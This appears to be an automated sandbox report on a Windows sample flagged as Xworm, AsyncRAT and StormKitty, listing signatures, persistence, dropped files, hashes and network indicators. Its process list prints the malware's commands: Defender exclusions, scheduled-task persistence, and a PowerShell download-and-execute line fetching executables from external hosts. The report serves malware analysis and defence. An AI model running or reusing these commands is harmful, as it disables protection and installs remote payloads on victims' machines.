Analysis Overview
SHA256
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
Threat Level: Known bad
The file 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe was found to be: Known bad.
Malicious Activity Summary
Detects executables using Telegram Chat Bot
AsyncRat
Detects Windows executables referencing non-Windows User-Agents
Contains code to disable Windows Defender
Xworm family
Detect Xworm Payload
StormKitty
StormKitty payload
Xworm
Detects executables attempting to enumerate video devices using WMI
Detects executables referencing credit card regular expressions
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
Detects executables referencing Windows vault credential objects. Observed in infostealers
Async RAT payload
Detects executables containing artifacts associated with disabling Windows Defender
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-18 01:36
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-18 01:36
Reported
2024-04-18 01:40
Platform
win10v2004-20240412-en
Max time kernel
152s
Max time network
165s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables attempting to enumerate video devices using WMI
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables containing artifacts associated with disabling Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables referencing Windows vault credential objects. Observed in infostealers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables referencing credit card regular expressions
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
"C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
"C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| FR | 86.68.222.14:7000 | | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.222.68.86.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.138.73.23.in-addr.arpa | udp |
| FR | 86.68.222.14:7000 | | tcp |
| FR | 86.68.222.14:7000 | | tcp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp
memory/4196-1-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phkrjhpb.yzv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1192-11-0x000002817BC20000-0x000002817BC42000-memory.dmp
memory/1192-12-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-13-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-14-0x000002817A180000-0x000002817A190000-memory.dmp
memory/4196-15-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-16-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1192-17-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-18-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-19-0x000002817A180000-0x000002817A190000-memory.dmp
memory/1192-22-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/3944-24-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/3944-31-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-30-0x000001E777590000-0x000001E7775A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/3944-37-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-38-0x000001E777590000-0x000001E7775A0000-memory.dmp
memory/3944-40-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4160-50-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | adabeb4ab5727937b41a82146fefd87f |
| SHA1 | 61429310f8374b1b752d74572b8512d695979493 |
| SHA256 | 14d3b1cadf88259544cec7202902a061821b12fae3ebfaa76a03e646710eb485 |
| SHA512 | 057ac7df07610fa4d111642dc6dc08c391be7b38f5a35bac7bb6c8345983df4d0b5f4a09ff534f9cddc24577f920e3a14b2fece8e71489c5c52254eaf25cf9c8 |
memory/4160-51-0x0000013EA7700000-0x0000013EA7710000-memory.dmp
memory/4160-53-0x0000013EA7700000-0x0000013EA7710000-memory.dmp
memory/4160-55-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/5108-65-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a0847a1f912ef989f2b3497b28c41b46 |
| SHA1 | 265ddd27c8fc985ab891472b5ef208d636ccfd8b |
| SHA256 | 774edb0a31714fd00aed4c384fe9cf97f6d97b02bf70505355ada4e49b9db4fd |
| SHA512 | 414f11e4addd81f1ff9e4d64d464b5f027e7ef45ee470178569bf27b54e69e2f00c0e38d8843d3e312432d7f03546271812433c5e617f5b6820ff306303e1af5 |
memory/5108-66-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-68-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-69-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-70-0x000001661AF80000-0x000001661AF90000-memory.dmp
memory/5108-72-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
| MD5 | d0685487fa7e474e68a40a1b1ff49b60 |
| SHA1 | 069285708e07814d852bbd5f39a7ffbb3c9e2d94 |
| SHA256 | 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6 |
| SHA512 | eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8 |
memory/3132-79-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/3132-81-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp
memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/4196-93-0x000000001B880000-0x000000001B88E000-memory.dmp
memory/1412-97-0x0000000000920000-0x0000000000938000-memory.dmp
memory/1412-98-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1412-100-0x0000000002AB0000-0x0000000002AC0000-memory.dmp
memory/2200-101-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2200-111-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp
memory/2200-118-0x000001BF7EF40000-0x000001BF7EF50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6e722800abdc44fc1ce4688ca490118f |
| SHA1 | f64a4ff6d6e9b567151260fbaa543c345565de3b |
| SHA256 | e63cad15f591e7898953167aa4ff8960500a177ad1bfa5e30229793b8b0af7e4 |
| SHA512 | 5b4f0da0561a1cc5f36bad93b1f0d9ce225e86464a4d1a5dbefe5eac8e339420446c9300b1362992b06838a302a8172944557e2c202bf980f5a22b98b9bea13b |
memory/2200-153-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1268-154-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1268-156-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp
memory/1268-155-0x00000169FDAF0000-0x00000169FDB00000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7825839543f6b3c710e1ab92dbe7f1ec |
| SHA1 | d43188bca6dd2038abf40282e497ee1d4c626f18 |
| SHA256 | 9fd6127316a4700789c6c0d93b62c3523e1245ae2d0180c91b0a4f39a80ccfd7 |
| SHA512 | aded824aec597a82736866bbbd44750f5b698b3408dfdb48979bd3d2638a1b4efd66ad00384bfc323275ff8f971cb85c80e00206201671f455c2870d9c27cb22 |
memory/1412-171-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp
memory/1412-172-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1412-173-0x00007FF93F0B0000-0x00007FF93F2A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat
| MD5 | fa8827eed9b3556b8990d00b41feb7bb |
| SHA1 | 70210b96cbee4e10397b76651dd930a7a31340b7 |
| SHA256 | 25dce0cc5288582592573f454962e8b79894c325396d4c15430056a93be2dc8b |
| SHA512 | d814d246afefb5547c6c1df49c7361eecc8e24ec772e00bee1a6ae666332b0917ed03b0700f8362850d2c91f59d4e8411b3c472b9f735db45b67d4fa364c44c2 |
memory/1268-176-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4964-177-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/4964-187-0x000001E27E360000-0x000001E27E370000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8836c0315d56105d43f002e992524f7 |
| SHA1 | d1297b4a079838bac77840d677414c09710cca17 |
| SHA256 | 41385f2cb42b41f060b51e83de3c70ec8a7fd07700e44b7450c6a603578030e0 |
| SHA512 | 342ed7a766c2e38d331f7026ab62dd6711e2b1644bf60a4742a38a37db4c14d150d9f408c94ab93bd7254b23ea022dc05635e0e06ea3840514c3bac833f4b501 |
memory/4964-189-0x000001E27E360000-0x000001E27E370000-memory.dmp
memory/4964-190-0x000001E27E360000-0x000001E27E370000-memory.dmp
memory/4964-192-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2436-196-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2256-203-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd0e89eb06376648b6721ad5c3cd8f48 |
| SHA1 | 04ecbc9e78c27a0ff25eeea95f45bae1ae3cc70b |
| SHA256 | 49aefa0ad54df58c06757e99015e9be5db27ade38108da2e864f6485ef8e4fd2 |
| SHA512 | 4132dd1e80d81c40648cf0475858075d79234a86352579933bdc697ab2f2f2f6107a1a0397caef27563592307e564c8e62c09c3f14fca323b157748713011291 |
memory/2256-209-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/2256-210-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
memory/2256-207-0x000001BC7FBC0000-0x000001BC7FBD0000-memory.dmp
memory/2964-212-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/2964-213-0x000002A374C20000-0x000002A374C30000-memory.dmp
memory/2964-214-0x000002A374C20000-0x000002A374C30000-memory.dmp
memory/2256-225-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83684a616885de4c1e9413ebd4a00bf4 |
| SHA1 | 3f97fd7910fa0de20c18c9d17f454595fade8eb0 |
| SHA256 | 5abc3dff344d8f19fbad3274354ace5ce41dca82abb1a85b6937883ce052b617 |
| SHA512 | da6107926221ac64fcb6392a9f0f6b9d09c18a89aadd5738d7613c59c25d9faad253fb7edb6e8eda4e2f5f08e07152ddbd067e6d7fae8fffb67f18b2dfa0dfae |
memory/2964-228-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1784-229-0x00007FF9207A0000-0x00007FF921261000-memory.dmp
memory/1784-230-0x000001AC63D80000-0x000001AC63D90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 48750759a6c508e64c9fa9a56f25fb68 |
| SHA1 | 2d885553d73940cc07d11c13c2fbc7d35a8ade91 |
| SHA256 | 06dbc75345d44373cf0657a2e2bea0dd957e921cc32e8350ca36b1efb0ef0368 |
| SHA512 | 39161378f31d95a016db63c332e69478aa51ad9cefa02472b5418f4680803f619ced4c638045fb54ffd0e3a5c95876e045c5a2fb50097b168f8be3f83dcba06b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a789e2ae2e0515279062eeaeba00deb0 |
| SHA1 | a2ce26255d067b3a01e7ac4b971173ac2369ed15 |
| SHA256 | 4acafdb79f135612dc23c8f158b094804bfe7f9c968c20dec74a36b217819d61 |
| SHA512 | be81d07c81fc89ec7bb8834dc9334e1fbe10acced0be0e49a8ec4af4bc476be2001782446ae466a46e86d670b1336b3f9b956a84cb45c255668b9462caaaf113 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mise à jour carte CPS.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-18 01:36
Reported
2024-04-18 01:39
Platform
win7-20240221-en
Max time kernel
146s
Max time network
121s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects executables using Telegram Chat Bot
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
